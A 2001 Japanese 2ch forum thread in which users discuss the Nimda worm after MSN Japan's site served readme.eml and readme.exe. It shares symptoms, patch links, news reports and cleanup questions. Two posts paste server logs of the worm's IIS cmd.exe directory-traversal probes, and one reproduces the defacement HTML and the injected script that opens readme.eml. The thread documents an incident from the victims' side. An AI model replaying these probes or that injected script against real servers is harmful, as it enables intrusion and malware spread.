MSNまとめ

1 ：名無しさん＠お腹いっぱい。：01/09/19 00:11
ニュー速板では、あきらかにウイルスだと言う人も
出てますが、どうなんでしょう？

関連スレ
MSNにウィルス添付？
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776
2：名無しさん＠お腹いっぱい。：01/09/19 00:13
http://www.msn.co.jp
を開くとreadme.exeというファイルがDLするようになってるそうです。

3 ：名無しさん＠お腹いっぱい。：01/09/19 00:21
MSNがやられましたｗ
topを読むと送られてきます。
http://www.msn.co.jp/readme.eml

4 ：名無しさん＠お腹いっぱい。：01/09/19 00:22
おいおい、古い穴狙ってるな

5 ：名無しさん＠お腹いっぱい。：01/09/19 00:30
emlから直接Base64の部分抜き出してデコードしてみたけど、
なんでこのファイル、こんなアイコンなんだ。

つーか普通にレスしちゃったけど、>>3のリンクはIEにパッチ
当ててない奴はまずいだろ。

6 ：名無しさん＠お腹いっぱい。：01/09/19 00:31
>>5
あ、ごめん。ネスケなので気が付かなかったー。

7 ：名無しさん＠お腹いっぱい。：01/09/19 00:32
http://www.mv-tohoku.co.jp/
http://www.prland.co.jp/

ここも同じ現象らしいよ。

8 ：名無しさん＠お腹いっぱい。：01/09/19 00:34
ついでにバイナリエディタで覗いて見たけど、こいつも
Admin.dllとか言ってるな。最近はさすがにCodeRedスレ
見てなかったから知らんけど、そこらへんの新種が関係
してんのかね

9 ：名無しさん＠お腹いっぱい。：01/09/19 00:35
MIMEのデコードが上手くいかない(;´Д`)
readme.exeのみのヘッダ教えてﾁｮ

10 ：名無しさん＠お腹いっぱい。：01/09/19 00:36
ということで、CodeRedスレの人間に聞いた方が早そうだな。寝よ

11 ：名無しさん＠お腹いっぱい。：01/09/19 00:36
http://210.150.177.216/
ここもな。

12 ：名無しさん＠お腹いっぱい。：01/09/19 00:38
>>9
ん？readme.exeのみのヘッダ？

13 ：名無しさん＠お腹いっぱい。：01/09/19 00:39
>>9
base64デコーダを使え。

14 ：名無しさん＠お腹いっぱい。：01/09/19 00:39
>>2,7
IIS使う馬鹿に何が提案できるんだ

15 ：9：01/09/19 00:41
>>12-13
RarUty使ってるのだが、base64として認識してくれない(;´Д`)

16 ：名無しさん＠お腹いっぱい。：01/09/19 00:41
寝ようと思ったけどまだ1時にもなってないのか。
見直してみたけど、やっぱりtftpとかも書いてあるわ。

17 ：名無しさん＠お腹いっぱい。：01/09/19 00:41
128 名前：　 投稿日：01/09/19 00:40 ID:KLLLh/gg
突然*.emlファイルが数千作成され、エクスプローラー開くと空き要領が5MB/secくらいの
スピードで減っていった。LANでつないでいるリブレットも同時進行(^^;

18 ：名無しさん＠お腹いっぱい。：01/09/19 00:43
>>17
実行したんかい（ｗ

それにしても、「不正なMIMEヘッダを含む～」とCodeRedの
合作かな。なんか面白みないね

19 ：名無しさん＠お腹いっぱい。：01/09/19 00:45
ワシもバイナリ観察ちゅう。いろいろ手が込んでますな。
しかし>>17のように実行は出来ないｗ

20 ：名無しさん＠お腹いっぱい。：01/09/19 00:47
新種ウイルスという話になってる＜ニュース速報

21 ：名無しさん＠お腹いっぱい。：01/09/19 00:47
やっぱ、ここで、話題になってましたか・・・・

実は、実行しちゃいました＞＜

readme.exeですが、
concept virs (CV) v5
って文字列が含まれてます。(TT)

concept virsをちょっと、調べてみたのですが、
英語版wordに感染するマクロウィルスらしいです。

22 ：名無しさん＠お腹いっぱい。：01/09/19 00:48
ああ、VMwareのバーチャルマシン上で実行しようとしたら、
何日か前に消しちまったんだった。残念。まあ挙動はバイナリ
みるだけでほとんど書いてあるような気もするが。

23 ：21：01/09/19 00:49
21です。

ニュース速報って、どこの、ニュース速報？＞２０

24 ：名無しさん＠お腹いっぱい。：01/09/19 00:50
>>23
あ、ややこしい書き方でｽﾏｿ、ココ（2ｃｈ）です。

25 ： ：01/09/19 00:50
対策されたみたいです、もう開きません

26 ：名無しさん＠お腹いっぱい。：01/09/19 00:52
ん？ちと待てよ。これって今度は無差別にこのemlを
送信するわけか？だとしたらトラフィックがまた・・・。
一個76.6KBのファイルをガンガン送られたらかなわんな

27 ：名無しさん＠お腹いっぱい。：01/09/19 00:53
>>17
その128、俺。

28 ：名無しさん＠お腹いっぱい。：01/09/19 00:54
>>27
ネットワークの方はどうなってる？パケット送りまくり？

29 ：名無しさん＠お腹いっぱい。：01/09/19 00:55
>>28
Librettoとラブコールしまくりだった。

30 ：名無しさん＠お腹いっぱい。：01/09/19 00:57
該当バグ。IE5.5と5.01だけらしいです。それ以前以後のIEやネスケには無関係(らしい)
http://www.microsoft.com/JAPAN/support/kb/articles/JP290/1/08.htm

ん？するとバックドアで入ってweb閲覧者にも送りつけて繁殖？
IE5.01～5.5限定とはいえ被害が広がるねえ。

31 ：名無しさん＠お腹いっぱい。：01/09/19 00:57
>>29
そうか、じゃあ後は自分で解析するのも面倒っつーか
意味ないからCodeRedスレのログでも読むかな。

32 ：名無しさん＠お腹いっぱい。：01/09/19 00:58
速報板のスレ。
http://news.2ch.net/test/read.cgi?bbs=news&key=1000822776&ls=50&nofirst=true

33 ：名無しさん＠お腹いっぱい。：01/09/19 01:05
過去ログ読んできたけどまだそれほど情報でてないな。
１のスレも読んでみたけど、メディアプレイヤーが立ち上がる？
「不正なMIMEヘッダ～」に加えて、「MediaPlayerのスキンファイル～」
の穴も突こうとしてんのかね。出遅れたからわからん。
CodeRedスレの人間教えれ

34 ：名無しさん＠お腹いっぱい。：01/09/19 01:06
http://www.trusecure.com/html/tspub/hypeorhot/rxalerts/tsa01024_cid177.shtml
かなぁ。

35 ：　：01/09/19 01:07
詳細はここで。
http://memo.st.ryukoku.ac.jp/archive/200109.month/thread.html

36 ：　：01/09/19 01:07
nimda？

37 ：名無しさん＠お腹いっぱい。：01/09/19 01:10
今日は夜から、なんかネットが重いなって思ってたけど、
こいつがでかいファイルを撒き散らしてたわけね

38 ：名無しさん＠お腹いっぱい。：01/09/19 01:13
>>35
サンクス、ざっと読んできた。また祭りか？とか思ってたけど、
洒落にならん・・・16種類。しかも良く考えたら「不正なMIME～」は
IEだけじゃなく、OutLookもか・・・

39 ：名無しさん＠お腹いっぱい。：01/09/19 01:13
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
って書いてあるよ？

40 ：名無しさん＠お腹いっぱい。：01/09/19 01:15
でかいって言っても高々79261バイトじゃないのｗ

41 ：名無しさん＠お腹いっぱい。：01/09/19 01:18
>>40
無差別に撒き散らすとしたら十分すぎるほどでかい

42 ： ：01/09/19 01:19
>>40
認識甘すぎ・・・・

43 ：40：01/09/19 01:20
すまん。鬱だ寝よう。

44 ：名無しさん＠お腹いっぱい。：01/09/19 01:22
>>43
まぁまぁ、ドンマイドンマイ

それにしても、こんどのコードネームは Nimda か

45 ：名無しさん＠お腹いっぱい。：01/09/19 01:26
つーかドンマイ言ってる場合じゃなかった。またも
ARP Floodが～。1分にARPだけで1025パケット・・・

46 ：名無しさん＠お腹いっぱい。：01/09/19 01:27
readme.exeを実行して、ブルーなので寝ます。
はぁ～

47 ：名無しさん＠お腹いっぱい。：01/09/19 01:33
実行したらexplorer.exeが落ちてﾜﾄｿﾝ博士が反応した
ﾒﾓﾘﾘﾌﾚｯｼｭするには便利なｱｲﾃﾑだよ

48 ：名無しさん＠お腹いっぱい。：01/09/19 01:38
ﾜﾗﾀ

しかし笑い事じゃない。どうでもいいけどこのreadme.exe、
リソース覗いてみたらアイコンが５つ。・・・意味ないぞ

とりあえず今回もJ-COM内からのアタックがガンガン来てる
上にARPの数はさらに増えつつある。とりあえずJ-COMに
メール出しとくか。

49 ：名無しさん＠お腹いっぱい。：01/09/19 02:12
　

50 ：名無しさん＠お腹いっぱい。：01/09/19 04:43
http://www.symantec.co.jp/region/jp/sarcj/data/w/w32.nimda.a@mm.html
結局、脆弱性”Unicode Web Traversal”のパッチは無し？
ってことは、IIS全部感染対象？

URLScanしか方法無いのかなぁ。
http://itpro.nikkeibp.co.jp/free/ITPro/NEWS/20010914/1/

51 ：名無しさん＠お腹○っぱい：01/09/19 04:52
しゃれにならんねえ





ﾜｼｮ-ｲ

52 ：名無しさん＠お腹いっぱい。：01/09/19 06:02
ぱっち。
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-078

53 ：名無しさん＠お腹いっぱい。：01/09/19 06:07
ﾜｹ ﾜｶ ﾗﾝ

54 ：名無しさん＠お腹いっぱい。：01/09/19 06:54
まだ読んでないけど、
Scary Hybrid Internet Worm Loose
http://wired.com/news/technology/0,1282,46944,00.html

55 ：名無しさん＠お腹いっぱい。：01/09/19 06:57
>>54
Nimdaは、先週起こったテロとは関係ないっちゅーことやろ

56 ：名無しさん＠お腹いっぱい。：01/09/19 07:11
感染サイト(^^;
http://search.fresheye.com/?kw=readme.eml&term=monthly
今日の昼頃には感染サイトが爆発するでしょう。

57 ：名無しさん＠お腹いっぱい。：01/09/19 07:24
シマンテックの解析が進んでるねぇ。凄い凄い。
がんばれしまんてくー。

58 ：名無しさん＠お腹いっぱい。：01/09/19 07:28
これってさぁ、「ウチはApache for Winだから関係ないもーん」とか
思ってても、メールから感染したら、やっぱwebページが改竄されるのかなぁ。

59 ：名無しさん＠お腹いっぱい。：01/09/19 07:39
>>58
感染したPC側はサーバーへのアタックもやるのかな。
それによると思う。
同じウィルスの感染手段が異なるだけのものだとすれば、
Webも改竄されるのでは。

60 ：ヤバイんじゃないの、、：01/09/19 08:23
このワーム絶対ヤバイよ、、。どうも>>59っぽいし。

そういえば
http://www.msn.co.jp/
ふっかつしないね、、、。

61 ：名無し：01/09/19 08:36
複数の感染方法を持ってるのかよ。

62 ：名無しさん＠お腹いっぱい。：01/09/19 09:12
http://www.mv-tohoku.co.jp/
http://www.prland.co.jp/

このサイトをクリックしたらPCがバリバリバリバリいうようになっちゃったよぉ～。
もう30以上もつづいているよ。。。
ファイルのダウンロード画面が一瞬出たんだけど、
保存するってやらなくても落ちて来ちゃうの？
対処法はどうすればいいの？

ぁぁぁぁぁああああパニックだよぉぉぉぉぉおおおおお！

63 ：62：01/09/19 09:18
Windowsファイル保護っていう画面が出て
Windowsを正しく動作するための必要なファイルが認識できない
バージョンのファイルに置き換えられています。システムの
安定を維持するために、これらのファイルを元のバージョンに
復元する必要があります。

Wndows2000 Professional CD-ROMを挿入してください。

ってなるんだけど、ただCDを入れれば勝手に処理してくれるのんですか？

64 ：62：01/09/19 09:20
Un Installなんとか
Map....

っていうお知らせ画面がでてきました。

65 ：ななし：01/09/19 09:22
駆除方法が確立されるまで、手出さないほうがいいんじゃない？

66 ：名無しさん＠お腹いっぱい。：01/09/19 09:22
あー、あんなの見てなくてよかった。
オレ、msnなんて昔から見たことないから・・・・・
あの錆、めちゃ遅いからね。

いまだに、立ち上げと同時にmsnが表示されたままの人が
多いようだし・・・・

67 ：名無しさん＠お腹いっぱい。：01/09/19 09:24
>>63
いやいや。
しばらくすると、各社から修復方法が発表になると思うので、
それまでは、予備のＰＣでやっていた方がいいと思う。

68 ：62：01/09/19 09:24
静かです、、すごく静かになりました。。。。
なんだかPCの中にとんでもない悪者が潜んでいそうでとてもコワイです。

69 ：名無しさん＠お腹いっぱい。：01/09/19 09:27
このemlファイル使った穴を塞ぐパッチって、IE5.5SP2には
含まれてるよね？

70 ：名無し：01/09/19 09:35
ＩＰアタック来てますか？

71 ：アル厨房：01/09/19 09:38
まだ駆除方法は出てないわけだ？
ひっかっかっちゃったよヽ(´ー｀)ノ　実害出てないけどね。。
そのうちファイルあぼられたりするのかなあ？

72 ：名無しさん＠お腹いっぱい。：01/09/19 09:38
>>70
昨日だけで34回きた

73 ：アル厨房：01/09/19 09:39
そうそう、各フォルダに009.emlとかいうファイルがいっぱいできてた。
ﾃﾞｽｸﾄﾌﾟﾝだけじゃなかったみたい(´Д｀)

74 ：アル厨房：01/09/19 09:40
どんな解説見てる？

75 ：アル厨房：01/09/19 09:42
これってアメリカの報復ﾊｶｰと関係あるのかなぁ？

76 ：アル厨房：01/09/19 09:43
ラウンジにサイト貼られてたから開けちゃったよヽ(;´ー｀)ノ
ファイルのバックアップとっといた方がいいかな？　 　 　

77 ：みみずん：01/09/19 09:46
うちやられちゃったよ・・・。
http://mimizun.mine.nu/

ハードディスクいっぱいにしてくれました。一応、*.emlと*.tmp.exeを削除しました。
でもなぁNTsp6aのIISでSRPあてていたんだが・・・

78 ：アル厨房：01/09/19 09:54
もしかしたらファイル消されたかもしれない。C:\のファイルが。。
気のせいかもしれないけどね。あと.eml消せなくなってるよ？？
>>77
ご愁傷様。。なんか実害あった？ファイル消されたりするのかなぁ？
意味ないんじゃないの？？

79 ：まじーにょ：01/09/19 10:02
ゴルァ、おれのサーバにアホみたいにきてるぞ。
CodeRedIIの比じゃないぐらいの割合で。

80 ：名無しさん＠お腹いっぱい。：01/09/19 10:02
>69
　このemlファイル使った穴を塞ぐパッチって、IE5.5SP2には
　含まれてるよね
IE6,0はどうなんでしょうか？

81 ：名無しさん＠お腹いっぱい。：01/09/19 10:06
新種ウイルス「Ｎｉｍｄａ」の感染拡大＝米司法長官
http://headlines.yahoo.co.jp/hl?a=20010919-00000116-jij-bus_all

　【シリコンバレー１８日時事】「Ｎｉｍｄａ（ニムダ）」と呼ばれる危険度の高い新種の
コンピューターウイルスが登場し、ウイルス対策会社などが注意を呼び掛けている。

　米ウイルス対策大手シマンテックによると、同ウイルスは、電子メールで届けられる添付
ファイル「ｒｅａｄｍｅ．ｅｘｅ」に潜み、これを利用者が不用意に開くことで感染する。
感染したコンピューターは、ウイルスメールを外部に発信。マイクロソフト製ウェブサーバー
ソフトを利用している他のコンピューターに対して同ソフトのセキュリティーホール
（欠陥）を狙った攻撃を仕掛ける。　（時事通信）[9月19日9時3分更新]

82 ：名無しさん＠お腹いっぱい。：01/09/19 10:08
>>80
確かめてみたら5.5SP2にはばっちり含まれてた。
悪いんだが6.0はわからん。でも対策されてない気がする

83 ：名無しさん＠お腹いっぱい。：01/09/19 10:08
http://help.msn.co.jp/notice.htm

84 ：名無しさん＠お腹いっぱい。：01/09/19 10:11
このスレで言ってるのって
http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS00-075
のことだよね。

これとCodeBlueって関係してんの？
ウチも昨日からアタック受けてるけどあれとMSNのは別物じゃないかな。

85 ：名無しさん＠お腹いっぱい。：01/09/19 10:12
>マイクロソフト製ウェブサーバーソフトを利用している他の
^^^^^^^^^^^^^^^^
>コンピューターに対して同ソフトのセキュリティーホール

>（欠陥）を狙った攻撃を仕掛ける。（時事通信）[9月19日9時3分更新]
^^^^^^^^^

これって、損害賠償責任ないの？

86 ：名無しさん＠お腹いっぱい。：01/09/19 10:16
210.91.45.224 - - [19/Sep/2001:10:03:44 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 233
210.91.45.224 - - [19/Sep/2001:10:03:50 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:03:57 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:05 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:10 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:16 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:23 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
210.91.45.224 - - [19/Sep/2001:10:04:30 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 205
210.91.45.224 - - [19/Sep/2001:10:04:38 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:10:20 +0900] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 233
HRS-MSG - - [19/Sep/2001:10:10:22 +0900] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:37 +0900] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:41 +0900] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:44 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:48 +0900] "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:51 +0900] "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:10:54 +0900] "GET /msadc/..%5c../..%5c../..%5c/..ﾁ../..ﾁ../..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:10:58 +0900] "GET /scripts/..ﾁ../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:01 +0900] "GET /sc?/c+dir HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:03 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:06 +0900] "GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0" 400 205
HRS-MSG - - [19/Sep/2001:10:11:09 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:11 +0900] "GET /scripts/..5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:14 +0900] "GET /scripts/..%5c../winnt/system32/cmd.exe HTTP/1.0" 404 214
HRS-MSG - - [19/Sep/2001:10:11:20 +0900] "GET /scripts/..%2f../winnt/system32/cmd.exe HTTP/1.0" 404 214

永遠に続く。重いわけだ。

87 ：名無しさん＠お腹いっぱい。：01/09/19 10:18
米軍がやっとんとちゃうか？

88 ：名無しさん＠お腹いっぱい。：01/09/19 10:23
感染したが、GoBackで昨日の午前中に戻したからたぶん大丈夫だろう。

89 ：名無し：01/09/19 10:24
PCとサーバの両方を狙う新種ワーム
http://www.zdnet.co.jp/news/0109/19/b_0918_01.html

90 ：80：01/09/19 10:25
>>82
ありがとうございます。
6.0から5.5にバージョンアップ？と思いつつIEのページからDLしようとしたら
最新バージョンがインストール済みでバージョンアップできませんですって。
こわいよー！

91 ：名無しさん＠お腹いっぱい。：01/09/19 10:26
えっと。感染したのでいろいろ見てみたけど

ありとあらゆる実行ファイルにreadme.emlなる文字列が確認されたのでめんどいのでクリーンインストールします。。。
パッチあてめんどいんだよなぁ。

92 ：91のみみずん：01/09/19 10:27
えっと、>>91はIISのサーバーの場合です。普通に見ているだけでは問題ありません。

93 ：名無しさん＠お腹いっぱい。：01/09/19 10:32
>>91
GoBack入れとけば良かったのにな。
うちはGoBackで感染ファイルが根こそぎなくなったわ。よかったよかった。

94 ：名無し：01/09/19 10:33
おいおい、ニュース速報板に書き込むとアタックが来る。

95 ：名無しさん＠お腹いっぱい。：01/09/19 10:36
>>90
6から5.5へは逝けません。6へは一方通行です。

96 ：名無しさん＠お腹いっぱい。：01/09/19 10:36
MSN復活しとるな。。。
お詫びも警告もないな。。。

やっぱりな。。。。

97 ：名無しさん＠お腹いっぱい。：01/09/19 10:37
http://headlines.yahoo.co.jp/hl?a=20010919-00000001-vgb-sci
複合的な攻撃、感染機能をもつウィルス　Nimda

Nimda＝ニダ？

なんて読むニダ

98 ：名無しさん＠お腹いっぱい。：01/09/19 10:39
>>94 >>96
米軍の作戦の1つニダ

99 ：名無しさん＠お腹いっぱい。：01/09/19 10:43
汚染源リスト
http://headlines.yahoo.co.jp/hl?a=20010919-00000002-vgb-sci

100 ：名無しさん＠お腹いっぱい。：01/09/19 10:43
Lynxでiモードの方のページ見てたから気付かなかったけど、
ここのトップにNimdaの警告が貼ってあるね。気が利くな。
ちなみに「見ただけで感染」を防ぐだけじゃなく、パッチ当てた
ならメール経由でも防げるはず。まあまだメールで来た人はいない
みたいだけど。

101 ：名無しさん＠お腹いっぱい。：01/09/19 10:45
>>94
あそこは、アクセスするだけでロクを取られているし、
そのログをハッキングしているやつがいるから要注意。

102 ：名無し：01/09/19 10:45
ニュース速報板に誰か書き込んでみた？
アタック来るよね？俺だけ？

103 ：名無しさん＠お腹いっぱい。：01/09/19 10:46
どれ、試しに書きこんでみるか。黒氷でもアタック見える？

104 ：名無しさん＠お腹いっぱい。：01/09/19 10:49
>>102
そうだよ。
あそこ、絶対にログが漏れているよ。

105 ：名無しさん＠お腹いっぱい。：01/09/19 10:50
>>102
ＩＰさらせ。

106 ：62：01/09/19 10:51
emlファイルってどうやって消せばいいの？
2300個もあったよ。。。
右クリックで消そうとすると

ファイルを削除できません。送り側のファイルまたはディスクから読みとれません。

っていわれるし。
消せるファイルは削除するとなんか実行されてるみたいだし。。。

マジで恐いよ！！

107 ：名無し：01/09/19 10:51
The firewall has blocked Internet access to your computer (TCP Port 8081) from ton.2ch.net (64.71.133.114) (TCP Port 4103) [TCP Flags: S].
The firewall has blocked Internet access to your computer (TCP Port 9081) from ton.2ch.net (64.71.133.114) (TCP Port 4105) [TCP Flags: S].

とうとう、ここもだよ。

108 ：アル厨房：01/09/19 10:54
おいおい、早くワクチン作ってくれぇヽ(；´Д｀)ノ　

109 ：名無しさん＠お腹いっぱい。：01/09/19 10:57
>>106
dosで消せ。

110 ：みみずん：01/09/19 10:58
>>106
うちはけせたけど。。。NT ServerSP6a+SRP

111 ：62：01/09/19 11:00
f: del *.eml

でいいですか？

112 ：名無しさん＠お腹いっぱい。：01/09/19 11:01
これみて。
http://www.ipa.go.jp/security/index.html

日本のお役所は、なーんも警告出してねーよ。
税金泥棒だな。

113 ：名無しさん＠お腹いっぱい。：01/09/19 11:05
>>106
ファイルの検索で期間を指定して当格ファイルを選び出して削除。

114 ：62：01/09/19 11:05
DEL F:*.eml

115 ：62：01/09/19 11:06
ファイルの検索でひっかかったemlファイルを右クリックで
削除しようとすると警告ばってんがつくんですよ。。。

116 ：名無しさん＠お腹いっぱい。：01/09/19 11:08
>>114
それだと友達から来て保存しているメールも削除されちゃうかもよ。

117 ：62：01/09/19 11:09
見つけたemlファイルを軽く一回クリックしただけでも
ファイルのダウンロードが始まるんですね。。。。
どうしよう。。。

118 ：　：01/09/19 11:34
http://210.135.182.178/
ここいくとreadme.exeが落とせる

119 ：名無しさん＠お腹いっぱい。：01/09/19 11:39
>>117
パソコン買い換える。

120 ：　：01/09/19 11:42
emlファイルってどうやって検索するんですか？
ＨＤＤ感染したっぽいんですけど

121 ：名無しさん＠お腹いっぱい。：01/09/19 11:50
誰かNimda専用スレ立ててくださいませ。こいつは酷い。
Ａｐａｃｈeのログが２分間隔くらいで
GET /scripts/..?../winnt/system32/cmd.exe HTTP/1.0
みたいなのばっかり、ログ見た時ぞっとしたよ。

122 ：　　：01/09/19 11:53
cmd.exe ってウイルスですか？＞１２１

123 ： ：01/09/19 11:58
<html><body bgcolor=black><br><br><br><br><br><br>
<table width=100%><td><p align="center"><font size=7 color=red>fuck USA Government</font><tr><td><p align="center">
<font size=7 color=red>fuck PoizonBOx<tr><td><p align="center"><font size=4 color=red>contact:sysadmcn@yahoo.com.cn</html>

<html><script language="JavaScript">window.open("readme.eml", null, "resizable=no,top=6000,left=6000")</script></html>

124 ：名無しさん＠お腹いっぱい。：01/09/19 12:00
>>122 コマンドプロンプトです。ファイ名を指定して実行で試してみれば
わかりますが。

125 ：124：01/09/19 12:00
ファイ名Ｘ ファイル名。鬱。

126 ：ななしん：01/09/19 12:10
ところで、こいつってＩＥコンポーネントブラウザ(cuamとか)ってどーなんだろ？

127 ：名無しさん＠お腹いっぱい。：01/09/19 12:14
パッチ当ててなければ食らうだろうね。
メーラーも、IEコンポーネント使ってるやつなら危険

128 ：ななしさん：01/09/19 12:27
ニダスレぎぼーん
情報がなくって困ってます。
いまＩＩＳをスキャンしているのは、いけないページを見てしまった
クライアントという事でいいですか？
アパッチのｈｔｔｐドキュメントをSAMBAで共有してたら、やられちゃうん
でしょうか？defaunt.htmlだけが対象ならいいんだけど、index.htmlも
書き換えられるんだったら、自宅のもやばい・・・嫁のＰＣはＳＰなんて
あててないもん

129 ：名無しさん＠お腹いっぱい。：01/09/19 12:40
>>128 感染ルートは１つじゃないです。
http://www.symantec.com/region/jp/sarcj/data/w/w32.nimda.a@mm.html

130 ：名無しさん＠お腹いっぱい。：01/09/19 12:45
ＩＥ５．００ってやばいすか？
ＳＰ２って書いてあるんすけど

131 ：名無しさん＠お腹いっぱい。：01/09/19 12:51
http://ton.2ch.net/test/read.cgi?bbs=sec&key=1000870301
ここでやろうぜ

132 ：名無しさん＠お腹いっぱい。：01/09/19 13:41
お粗末msn　さらしあげ。

133 ：こんな感じ：01/09/19 15:45
2001/09/18(23:15:46) W-SV 211.125.194.55 [80] 404 240 "GET /MSADC/root.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:49) W-SV 211.170.249.153 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:54) W-SV 211.170.249.153 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:57) W-SV 211.125.194.55 [80] 404 250 "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:15:58) W-SV 211.125.194.55 [80] 404 250 "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:00) W-SV 211.170.249.153 [80] 404 264 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:00) W-SV 211.125.194.55 [80] 404 264 "GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:03) W-SV 211.103.80.185 [80] 404 263 "GET /scripts/..ﾁ../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:05) W-SV 211.170.249.153 [80] 404 281 "GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:13) W-SV 211.103.80.185 [80] 404 263 "GET /scripts/..ﾀ/../winnt/system32/cmd.exe?/c+dir HTTP/1.0"
2001/09/18(23:16:14) W-SV 211.170.249.153 [80] 404 281 "GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir HTTP/1.0"

昨晩から、ずっと・・・・・・・・・

134 ：MSN広報部：01/09/19 19:33
http://help.msn.co.jp/notice.htm
ご質問とご回答
Q.自分の会社のサーバーが被害にあった。MSN からの攻撃が原因ではないか。

A. MSN ではサーバーが直接マイクロソフト社外のサーバーに対して影響を及ぼしたことはないと考えています。
MSN のインターネット上に開いたサーバーは、サーバー機能ではなくそのコンテンツファイルが 9/18 の夜 11 時以降
1 時間ほど感染した状態にありましたが、これにより影響を受けたのは直接このサーバーにアクセスした利用者の
コンピュータになります。なお、利用者のコンピュータが感染するには、ブラウザのバージョンなどいくつかの条件が
そろった場合に限られます。

135 ：名無しさん＠お腹いっぱい。：01/09/19 19:35
普段寛容な俺もMSNのこのコメントには殺意を覚えた。
とくに「～ないと考えています。」ってところ。

136 ：三遊亭・з･)) ◆dABRuhdE ：01/09/19 19:36
>>90 他
「不適切な MIME ヘッダーが原因で Internet Explorer が電子メールの添付ファイルを実行する」（本日更新）
　http://www.microsoft.com/japan/technet/security/prekb.asp?sec_cd=MS01-020

> 注 : ご使用の Internet Explorer を Internet Explorer 5.5 Service Pack 2 (SP2)、
> Internet Explorer 5.01 Service Pack 2 (SP2) または Internet Explorer 6 に
> アップグレードすることによっても、この問題を修正することができます。

だってさ ヽ(´ー｀)ノ

137 ： ：01/09/19 19:39
ってーか、パッチ配布してる大元が、、、何でその穴使ったウイルスに
感染するかね。。。my糞。

138 ：名無しさん＠お腹いっぱい。：01/09/20 00:10
やっぱ。カネの亡者の会社だけあるな。

139 ：名無しさん＠お腹いっぱい。：01/09/20 09:21
どうしてみんなは
「Windowsが欠陥品である」
と言うことに気がつかない？

見ただけで勝手に何かを実行するなんて言う構造は
根本的に間違い。

こんな基地外であるMicro$oftは、早く潰れて下さい。
1番悪いのは、ビルゲイツです。
商売以外にももうちょっと頭使って下さい(藁

で2番目にに悪いのが、ウィルス作成者。
いくらWindowsがショボイと言っても、
そんなことやってはいけません。

3番目に悪いのは、それに気がつかずM$製品を使う
厨房ユーザー

感染したmsnは、もちろん消防(ププププ

140 ：さわだけんじ：01/09/20 09:56
>>139
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
いつかヴァスコダ・ガマのように
…

141 ：名無しさん＠お腹いっぱい。：01/09/20 09:58
コピペ厨ウザイ

142 ：名無しさん＠お腹いっぱい。：01/09/20 10:01
>>139
自分で工夫したり探求する能力がないんだよ、
｢周りが使っているから｣と言うだけでそれ以上の
判断止めちゃう奴が多いからね。
大丈夫、たとえ欠陥有っても気がつかないから。

要するにMSの問題じゃなくてユーザーの問題。
便利な部分だけ受け取って面倒な部分は他人任
せにしたり目を背け続けた結果だよ。こういう
人たちはどんなOS使っても同じね。

143 ：名無しさん＠お腹いっぱい。：01/09/20 10:17
>>142
周りが使ってるからというより、あらゆるソフトが手に入りやすいから
